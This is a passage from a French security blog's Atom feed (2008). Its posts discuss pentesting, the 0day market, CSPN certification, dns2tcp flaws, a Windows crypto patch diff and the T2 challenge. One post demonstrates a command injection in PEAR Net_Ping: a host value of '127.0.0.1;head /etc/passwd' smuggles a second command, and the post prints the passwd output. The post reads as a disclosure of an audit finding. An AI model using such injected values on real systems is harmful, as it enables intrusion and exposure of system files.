italic;"&gt;include&lt;/span&gt; est souvent marginal :)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Il est beaucoup plus intéressant dans le cadre d'un test d'intrusion d'identifier des problèmes simples (ex. compte sans mot de passe), susceptibles d'être exploités par des codes automatiques ou des employés malveillants. Ou encore des &lt;span class="Apple-style-span" style="font-style: italic;"&gt;failles de conception&lt;/span&gt;, qui nécessitent de remettre à plat une architecture réseau ou un produit.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Si vous arrivez à persuader un service informatique qu'il est absolument nécessaire d'activer la &lt;a href="http://blogs.technet.com/swi/archive/2008/11/11/smb-credential-reflection.aspx"&gt;signature SMB&lt;/a&gt; pour contrer les attaques en &lt;span class="Apple-style-span" style="font-style: italic;"&gt;réflexion de crédences&lt;/span&gt;, le test a servi à quelquechose. Sinon, le client restera vulnérable à une faille de conception des protocoles LM et NTLM qui garantit le "succès" de tout test de pénétration ultérieur (sauf si l'auditeur est mauvais, ce qui peut être une conclusion intéressante).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;&lt;span class="Apple-style-span" style="font-style: italic;"&gt;Quel modèle de marché pour les failles ?&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Dans ces conditions, la recherche de failles apparait plus comme une activité intellectuelle et ludique que comme la seule et unique source d'intrusion en 2009.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Les américains, prompts à quantifier et à titriser, tentent depuis longtemps d'assigner une valeur monétaire aux "0day" pour imaginer dompter la bête (voir à ce sujet le débat lancé sur la liste &lt;a href="http://archives.neohapsis.com/archives/dailydave/2008-q4/0086.html"&gt;Daily Dave&lt;/a&gt; -  il est vrai que la société Immunity &lt;a href="http://www.immunitysec.com/resources-papers.shtml"&gt;ne tarit pas d'éloges&lt;/a&gt; sur les vertus du "0day") .&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Compte-tenu du fait que la loi du marché à tout prix a provoqué la crise mondiale que l'on sait, j'ai du mal à voir comme un marché du "0day" va stimuler la sécurité informatique du côté défensif ... D'autant que les pratiques dans le domaine ne sont déjà plus très étiques, et que les pirates résidant en dehors du "monde libre" sont peu susceptibles de vendre à des américains.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;D'autres chercheurs de failles (européens: [&lt;a href="http://www.wslabi.com/"&gt;WSLabi&lt;/a&gt;][&lt;a href="http://vupen.com/"&gt;Vupen&lt;/a&gt;]) se tournent vers les vendeurs d'IDS/IPS : "achetez tel produit car c'est le seul à vous protéger contre la dernière faille dans Internet Explorer, dont seuls les chinois disposent !". Tant d'années au service de la sensibilisation des utilisateurs et des bonnes pratiques pour entendre ça ... c'est triste. Si personne ne surfait sous le compte "administrateur", on en serait pas là. Heureusement que d'autres prédisent la mort des IDS/IPS en 2009 :)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;D'ailleurs &lt;a href="http://snort.org/"&gt;Snort&lt;/a&gt; s'oriente vers la fonction de "&lt;span class="Apple-style-span" style="font-style: italic;"&gt;Passive Vulnerability Scanner&lt;/span&gt;" plutôt que vers la détection &lt;span class="Apple-style-span" style="font-style: italic;"&gt;hardcore&lt;/span&gt;, vouée à l'échec.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Voilà, c'est tout pour aujourd'hui. Si vous en voulez plus, il faudra voter pour ma soumission à &lt;a href="http://www.sstic.org/"&gt;SSTIC&lt;/a&gt;. Ah non je dois confondre avec BlackHat, le processus de sélection des soumissions à SSTIC reste totalement obscur pour moi :)&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-8886504442254565780?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/8886504442254565780/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=8886504442254565780' title='7 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/8886504442254565780'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/8886504442254565780'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/12/o-va-la-scurit.html' title='Où va la sécurité ?'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-1757306055963457469</id><published>2008-12-08T09:00:00.000+01:00</published><updated>2008-12-08T09:00:01.006+01:00</updated><title type='text'>Mise à jour du troll Latex</title><content type='html'>Quand on voit ceci, peut-on réellement croire "qu'au moins, Latex est l'outil respectant le plus les règles typographiques et la mise en page des documents" ?&lt;div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/latex_fail.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 564px; height: 246px;" src="http://newsoft.dyndns.org/blog/latex_fail.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;(Source: &lt;a href="http://www.certa.ssi.gouv.fr/site/CERTA-2008-ACT-048.pdf"&gt;newsletter n°48&lt;/a&gt; du CERTA. Oui j'aime bien lire les newsletters :)&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-1757306055963457469?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/1757306055963457469/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=1757306055963457469' title='1 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1757306055963457469'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1757306055963457469'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/12/mise-jour-du-troll-latex.html' title='Mise à jour du troll Latex'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-9196211171267421569</id><published>2008-12-03T01:57:00.002+01:00</published><updated>2008-12-03T02:53:48.130+01:00</updated><title type='text'>Ceci n'est pas du sport ...</title><content type='html'>... mais ça pourrait le devenir.&lt;br /&gt;&lt;br /&gt;Et oui, pour les béotiens qui confondent Evaluation et Certification, sachez que &lt;a href="http://espn.go.com/"&gt;ESPN&lt;/a&gt; est un site sportif de premier plan, tandis que &lt;a href="http://www.ssi.gouv.fr/fr/confiance/certif-cspn.html"&gt;CSPN&lt;/a&gt; est une nouvelle initiative du gouvernement français.&lt;br /&gt;&lt;br /&gt;Qu'ils soient pardonnés, car il n'est pas facile de s’y retrouver dans la profusion d'annonces autour de la "sécurité" (telles que la plateforme &lt;a href="https://internet-signalement.gouv.fr/"&gt;Internet Signalement&lt;/a&gt; ou les gesticulations autour de la loi &lt;a href="http://fr.wikipedia.org/wiki/Loi_Hadopi"&gt;HADOPI&lt;/a&gt;).&lt;br /&gt;&lt;br /&gt;L’objectif de la &lt;span style="font-weight: bold;"&gt;Certification Sécurité de Premier Niveau&lt;/span&gt; est louable : il s’agit de vérifier que des fonctions de sécurité essentielles sont assurées par un produit d’usage courant, en temps et en budget contraint – d’aucun parlerait de certification "agile", par opposition aux évaluations de type &lt;span style="font-weight: bold;"&gt;Critères Communs&lt;/span&gt;. Ces dernières ne sont praticables que sur des systèmes très contraints, toute autre tentative étant &lt;a href="http://www.pentest.es/checkpoint_hack.pdf"&gt;vouée à l’échec&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Bien entendu, on peut débattre à l’envi des conditions dans lesquelles cette certification a été mise en œuvre. Par exemple tous les &lt;a href="http://www.ssi.gouv.fr/fr/confiance/cesti.html"&gt;CESTI&lt;/a&gt; sont automatiquement devenus évaluateurs potentiels pour la CSPN. On conçoit mal qu’un laboratoire capable de délivrer une certification EAL4 à un VPN ne puisse pas vérifier la solidité du chiffrement de WinZip. Mais on imagine quand même que le processus de certification Critères Communs, impliquant une forte coopération de l’éditeur, est assez différent d’une évaluation de 20 jours parfois sans accès au code source.&lt;br /&gt;&lt;br /&gt;Les &lt;a href="http://www.ssi.gouv.fr/fr/confiance/certif-cspn.html"&gt;premiers résultats&lt;/a&gt; de cette certification étant tombés, on peut également être surpris par le choix des produits certifiés : &lt;a href="http://www.trango-vp.com/"&gt;Trango Hypervisor&lt;/a&gt;, &lt;a href="http://www.blancco.com/"&gt;Blancco Data Cleaner&lt;/a&gt;, et &lt;a href="http://www.truecrypt.org/"&gt;TrueCrypt&lt;/a&gt;. Si le choix de ce dernier est assez logique, les deux premiers sont quasi-inconnus et bénéficient d’une publicité d’enfer via un site institutionnel, qu'ils &lt;a href="http://www.trango-vp.com/download/press/release/20080929_CSPN_PR.pdf"&gt;ne se privent pas d'exploiter&lt;/a&gt; - le tout pour une somme assez modique (20 jours de consultant). Trango venant d'être racheté par &lt;a href="http://www.vmware.com/technology/mobile/"&gt;VMWare&lt;/a&gt;, et Blancco étant une société Finlandaise, on ne voit pas trop l'intérêt pour la DCSSI de s'engager dans cette voie.&lt;br /&gt;&lt;br /&gt;Parmi les détails amusants, on notera la référence à &lt;a href="http://www.frsirt.com/"&gt;FrSIRT&lt;/a&gt; (&lt;a href="http://www.ssi.gouv.fr/fr/confiance/cspn/2008-02.pdf"&gt;page 16&lt;/a&gt;) comme portail de référence (son propriétaire n’ayant pourtant pas toujours été en odeur de sainteté dans les sphères gouvernementales) – et on notera aussi que &lt;a href="http://esec.fr.sogeti.com/"&gt;Sogeti&lt;/a&gt; n’a pas rendu son rapport définitif. C’est probablement comme le &lt;a href="http://www.sstic.org/"&gt;SSTIC&lt;/a&gt; – il y a du rab’ pour ceux qui galèrent avec Latex :)&lt;br /&gt;&lt;br /&gt;Bien entendu, le challenge consiste maintenant à mettre en défaut la certification d’un produit, malgré l’avertissement chapeau assez explicite :&lt;br /&gt;&lt;span style="font-style: italic;"&gt;"La certification ne constitue pas en soi une recommandation du produit par la Direction&lt;/span&gt;&lt;span style="font-style: italic;"&gt; centrale de la sécurité des systèmes d’information (DCSSI), et ne garantit pas que le produit&lt;/span&gt;&lt;span style="font-style: italic;"&gt; certifié soit totalement exempt de vulnérabilités exploitables."&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Dans la pratique, ça n’est pas aussi simple : les rapports des produits certifiés font déjà état de failles avérées dans certaines configurations. Par exemple le produit d’effacement sécurisé ne sait pas accéder à la zone HPA sur les disques IDE, alors qu’il y parvient sur les disques SATA !&lt;br /&gt;&lt;br /&gt;Tout comme pour les critères communs, la certification obtenue doit être replacée dans le contexte de la cible de sécurité. Dans ces conditions, la probabilité de trouver une faille qui aurait échappée au certificateur est beaucoup plus faible.&lt;br /&gt;&lt;br /&gt;Et les produits qui échouent lamentablement à passer la certification n'apparaissent nulle part - tout est bien qui finit bien, donc :)&lt;br /&gt;&lt;br /&gt;Passons maintenant au jeu de la &lt;span style="font-style: italic;"&gt;newsletter&lt;/span&gt;, à l’aide du script Python suivant :&lt;br /&gt;&lt;blockquote  style="font-family:courier new;"&gt;&lt;span style="font-size:85%;"&gt;fp = open("newsletter52.txt", "ra")&lt;br /&gt;all = fp.readlines()&lt;br /&gt;fp.close()&lt;br /&gt;&lt;br /&gt;count = 0&lt;br /&gt;for l in all:&lt;br /&gt;words = l.split(" ")&lt;br /&gt;for w in words:&lt;br /&gt;  if ((len(w) == 5) and (w.startswith("270"))):&lt;br /&gt;    count = count + 1&lt;br /&gt;&lt;br /&gt;print "Score: %d" % count&lt;br /&gt;&lt;/span&gt;&lt;/blockquote&gt;Verdict: 44. On atteint le &lt;a href="http://news0ft.blogspot.com/2008/02/python-du-matin-chagrin.html"&gt;&lt;span style="font-style: italic;"&gt;high score&lt;/span&gt;&lt;/a&gt;, mais sans le dépasser !&lt;br /&gt;&lt;br /&gt;Vous noterez au passage le laconique :&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt; - Outil : Nouvelle version de l'outil de tunnel sur DNS, dns2tcp v0.4.3.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;    &lt;a href="http://www.hsc.fr/ressources/outils/dns2tcp/index.html.fr"&gt;http://www.hsc.fr/ressources/outils/dns2tcp/index.html.fr&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;En vérité, il s’avère que les versions &lt;a href="http://www.securityfocus.com/bid/31080"&gt;0.4.0&lt;/a&gt;, &lt;a href="http://www.securityfocus.com/bid/32071"&gt;0.4.1&lt;/a&gt; et 0.4.2 étaient toutes vulnérables à des failles de sécurité, ce que n’indique pas vraiment le site de l’éditeur.&lt;br /&gt;&lt;br /&gt;Le scénario est assez classique dans le monde de la sécurité : tout le monde se dit "c’est du sérieux, on peut avoir confiance" ou "quelqu’un a sûrement regardé, puisque c’est Open Source" (sic).&lt;br /&gt;&lt;br /&gt;Puis un jour, survient l’&lt;span style="font-style: italic;"&gt;integer overflow&lt;/span&gt; – et là, c’est le drame. Car cela signifie que ni le développeur, ni sa &lt;span style="font-style: italic;"&gt;toolchain&lt;/span&gt; n’a connaissance de cette classe d’attaque. Et les bogues n’ont pas manqué de s’enchainer rapidement par la suite.&lt;br /&gt;&lt;br /&gt;Il faut dire que le co-auteur de cet outil a été sévèrement châtié : il est désormais assigné à la formation "&lt;a href="http://www.hsc.fr/services/formations/programmation_php.html.fr"&gt;Développement sécurisé en PHP par la pratique&lt;/a&gt;". Personne n’a mérité ça, pas même les mainteneurs Debian.&lt;br /&gt;&lt;br /&gt;En parlant de PHP, voici un exemple de code PEAR :&lt;br /&gt;&lt;blockquote  style="font-family:courier new;"&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;$ cat lol.php&lt;br /&gt;&lt;br /&gt;require ("Net/Ping.php");&lt;br /&gt;$count=1;&lt;br /&gt;$host='127.0.0.1';&lt;br /&gt;$ping = Net_Ping::factory();&lt;br /&gt;$ping-&gt;setArgs(array('size' =&gt; 1, 'count' =&gt; $count));&lt;br /&gt;$response = $ping-&gt;ping($host);&lt;br /&gt;echo join("\r\n", $response-&gt;getRawData());&lt;br /&gt;?&gt;&lt;br /&gt;&lt;br /&gt;$ php5 -f lol.php&lt;br /&gt;PING 127.0.0.1 (127.0.0.1) 1(29) bytes of data.&lt;br /&gt;9 bytes from 127.0.0.1: icmp_seq=1 ttl=64&lt;br /&gt;&lt;br /&gt;--- 127.0.0.1 ping statistics ---&lt;br /&gt;1 packets transmitted, 1 received, 0% packet loss, time 0ms&lt;br /&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;Et voici ce qu'il m'a fallu 5 minutes pour trouver lors d'un audit quelconque:&lt;br /&gt;&lt;blockquote&gt;&lt;span style="font-family:courier new;"&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;$ cat lol.php&lt;br /&gt;&lt;br /&gt;require ("Net/Ping.php");&lt;br /&gt;$count=1;&lt;br /&gt;$host='127.0.0.1;head /etc/passwd';&lt;br /&gt;$ping = Net_Ping::factory();&lt;br /&gt;$ping-&gt;setArgs(array('size' =&gt; 1, 'count' =&gt; $count));&lt;br /&gt;$response = $ping-&gt;ping($host);&lt;br /&gt;echo join("\r\n", $response-&gt;getRawData());&lt;br /&gt;?&gt;&lt;br /&gt;&lt;br /&gt;$ php5 -f lol.php&lt;br /&gt;PING 127.0.0.1 (127.0.0.1) 1(29) bytes of data.&lt;br /&gt;9 bytes from 127.0.0.1: icmp_seq=1 ttl=64&lt;br /&gt;&lt;br /&gt;--- 127.0.0.1 ping statistics ---&lt;br /&gt;1 packets transmitted, 1 received, 0% packet loss, time 0ms&lt;br /&gt;&lt;br /&gt;root:x:0:0:root:/root:/bin/bash&lt;br /&gt;daemon:x:1:1:daemon:/usr/sbin:/bin/sh&lt;br /&gt;bin:x:2:2:bin:/bin:/bin/sh&lt;br /&gt;sys:x:3:3:sys:/dev:/bin/sh&lt;br /&gt;sync:x:4:65534:sync:/bin:/bin/sync&lt;br /&gt;games:x:5:60:games:/usr/games:/bin/sh&lt;br /&gt;man:x:6:12:man:/var/cache/man:/bin/sh&lt;br /&gt;lp:x:7:7:lp:/var/spool/lpd:/bin/sh&lt;br /&gt;mail:x:8:8:mail:/var/mail:/bin/sh&lt;br /&gt;news:x:9:9:news:/var/spool/news:/bin/sh&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;Même dans la Livebox, on ne trouve plus ce genre de faille !&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;« Depuis que PHP a été inventé, je n’ai plus besoin de remplir mes rapports avec ‘le routeur a répondu à ICMP Timestamp’ ou ‘le serveur autorise la méthode non sécurisée TRACE’ » -- various pentesters.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-9196211171267421569?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/9196211171267421569/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=9196211171267421569' title='13 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/9196211171267421569'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/9196211171267421569'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/12/ceci-nest-pas-du-sport.html' title='Ceci n&apos;est pas du sport ...'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>13</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-2282616628696367675</id><published>2008-09-10T22:01:00.004+02:00</published><updated>2008-09-10T23:04:22.552+02:00</updated><title type='text'>On a frôlé le Big One(tm)</title><content type='html'>... la question est: "lequel ?" :)&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Je ne parle donc pas de la mise en service du &lt;a href="http://fr.wikipedia.org/wiki/Large_Hadron_Collider"&gt;LHC&lt;/a&gt;, mais bien de la cryptographie dans les versions françaises de Windows, qui par une sorte d'exception culturelle, a &lt;a href="http://www.google.fr/search?q=high+encryption+pack"&gt;toujours été&lt;/a&gt; beaucoup &lt;a href="http://expertmiami.blogspot.com/2008/06/francaises-francais-time-to-bend-over.html"&gt;plus faible&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;On apprend donc dans &lt;a href="http://www.certa.ssi.gouv.fr/site/CERTA-2008-AVI-389.pdf"&gt;cette note du CERTA&lt;/a&gt; qu'un &lt;a href="http://support.microsoft.com/kb/955417/fr"&gt;patch&lt;/a&gt; est désormais disponible pour le &lt;span class="Apple-style-span" style="font-style: italic;"&gt;Protected Storage&lt;/span&gt;. Contrairement au &lt;span class="Apple-style-span" style="font-style: italic;"&gt;High Encryption Pack&lt;/span&gt; pour Windows 2000, ce patch s'applique également à Windows XP SP2 et 2003 qui disposaient encore de quelques portions de code "peu entropiques".&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Voyons ce que cela donne sur un Windows XP SP2 FR complètement à jour. Nous allons pour cela utiliser l'outil gratuit &lt;a href="http://cgi.tenablesecurity.com/tenable/patchdiff.php"&gt;PatchDiff2&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Après installation, un seul fichier est modifié: &lt;span class="Apple-style-span" style="font-style: italic;"&gt;pstore.dll&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Dans ce fichier, une fonction a été supprimée (&lt;span class="Apple-style-span" style="font-style: italic;"&gt;IsEncryptionPermitted&lt;/span&gt;), une autre a été ajoutée. Soit.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/pstore_removed.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://newsoft.dyndns.org/blog/pstore_removed.png" border="0" alt="" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Voyons maintenant les fonctions qui ont été modifiées: elles sont au nombre de 8.&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/pstore_changed.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://newsoft.dyndns.org/blog/pstore_changed.png" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Prenons la première: &lt;span class="Apple-style-span" style="font-style: italic;"&gt;FMyEncryptKeyBlock.&lt;/span&gt;&lt;span class="Apple-style-span" style=""&gt; Un seul bloc fonctionnel a été modifié.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/pstore_deskey.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://newsoft.dyndns.org/blog/pstore_deskey.png" border="0" alt="" /&gt;&lt;/a&gt;Même si vous ne lisez pas bien l'assembleur, je pense que vous avez une petite idée de ce qui se passe ...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Au fait, à quoi sert le &lt;span class="Apple-style-span" style="font-style: italic;"&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/bb432403(VS.85).aspx"&gt;Protected Storage&lt;/a&gt;&lt;/span&gt; ? A stocker un peu &lt;a href="http://www.forensicideas.com/tools.html"&gt;tous les mots de passe&lt;/a&gt; qui trainent ... Heureusement il est &lt;span class="Apple-style-span" style="font-style: italic;"&gt;deprecated&lt;/span&gt; à partir de Vista.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;En conclusion:&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;Difficile de se moquer de &lt;a href="http://sid.rstack.org/blog/index.php/275-du-hasard-et-de-ses-consequences"&gt;Debian&lt;/a&gt; après ça.&lt;/li&gt;&lt;li&gt;Il ne faut pas croire que "d'autres ont audité le binaire, et s'il y avait quelquechose ça se saurait".&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;A part ça quoi de neuf ? C'est presque la routine: patch Microsoft pour 5 failles GDI+, failles dans Wordpress, Apple QuickTime, mDNSResponder/Bonjour, Google Chrome ... Mais on attend toujours le &lt;span class="Apple-style-span" style="font-style: italic;"&gt;Big One&lt;/span&gt;.&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-2282616628696367675?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/2282616628696367675/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=2282616628696367675' title='10 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/2282616628696367675'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/2282616628696367675'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/09/on-frl-le-big-onetm.html' title='On a frôlé le Big One(tm)'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>10</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-7905702846776293714</id><published>2008-09-07T19:00:00.000+02:00</published><updated>2008-09-07T19:00:00.522+02:00</updated><title type='text'>Bâches, suite (ou comment finir le challenge T2 en 2 minutes)</title><content type='html'>Et oui, j'ai rattrapé quelques flux RSS de retard pendant ce week-end pluvieux :)&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;1. Tout d'abord le piratage. Il est responsable de &lt;a href="http://www.zdnet.fr/actualites/internet/0,39020774,39382795,00.htm"&gt;tous les maux&lt;/a&gt;, comme d'habitude. Mais de là à déclarer:&lt;/div&gt;&lt;blockquote&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-style: italic;"&gt;(...) selon Henri Dumoulin, responsable de Pathé Nord. « Le piratage nous a joué un petit tour », a-t-il déclaré à l'AFP. « En 1998 (date de sortie de Titanic), il n'y avait pas d'internet à haut débit. »&lt;/span&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div&gt;... il y a un pas.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;2. Un cas d'école de fuite d'information.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Pour alimenter sa &lt;a href="http://isc.sans.org/"&gt;chronique quotidienne&lt;/a&gt;, le &lt;a href="http://sans.org/"&gt;SANS&lt;/a&gt; a demandé à ses lecteurs: "&lt;a href="http://isc.sans.org/diary.html?storyid=4988"&gt;proposez nous des idées innovantes pour améliorer la sécurité d'Internet&lt;/a&gt;".&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;Je vous fait grâce de mon avis sur les réponses obtenues, par contre j'aime bien ce passage:&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;blockquote&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-style: italic;"&gt;I am reminded as a result of reading your note on new Cyber strategies, about a place I used to work that constructed aerospace components for the many companies that offered their goods to the USA military machine. One of these devices were housings machined to contain the electronics which was capable of jamming the navigation signal of the French Exocet missile.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-style: italic;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-style: italic;"&gt;When the target, usually a ship, is acquired from the radar of the jet fighter, the navigation was transferred to the missile's gyro system so that once released from under the wing of the fighter, the missile was on it's own to reach it's designated target. Raytheon, a Canadian designer of anti aircraft and anti missile electronics developed a signal to send to the incoming missile that would instruct the missile to turn around and return to the jet from whence it came. Needless to say the pilot would have a sudden digestive problem once it became known the missile he just launched was coming back for a visit.&lt;/span&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;3. Et enfin, le &lt;a href="http://www.t2.fi/challenge/"&gt;challenge T2&lt;/a&gt;.&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Pour mémoire, il s'agit d'un challenge annuel de &lt;span class="Apple-style-span" style="font-style: italic;"&gt;reverse enginnering&lt;/span&gt;, qui attire chaque année un grand nombre de &lt;a href="http://actes.sstic.org/SSTIC08/Deprotection_Semi_Automatique_Binaire/"&gt;participants de qualité&lt;/a&gt;, même s'il n'y a rien à gagner (à part un aller-retour en Finlande). C'est probablement le manque du challenge Securitech qui se fait sentir :)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Le challenge 2008 a commencé samedi matin à 9h, heure française. L'objectif est un peu différent des années précédentes, puisque cette fois-ci l'objectif est de retrouver une adresse email cachée dans un Tetris 3D.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Par curiosité, je télécharge et je lance l'exécutable sur mon Vista 32-bits. Comme souvent avec ces challenges bourrés d'astuces Windows, rien ne se passe. Il y a probablement des valeurs spécifiques à Windows XP SP2 "en dur" dans le programme.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Toutefois un processus "challenge.exe" est présent en mémoire, Vista va donc me permettre (via le Task Manager) de créer un fichier de vidage au format "minidump applicatif".&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;A tout hasard, je cherche une 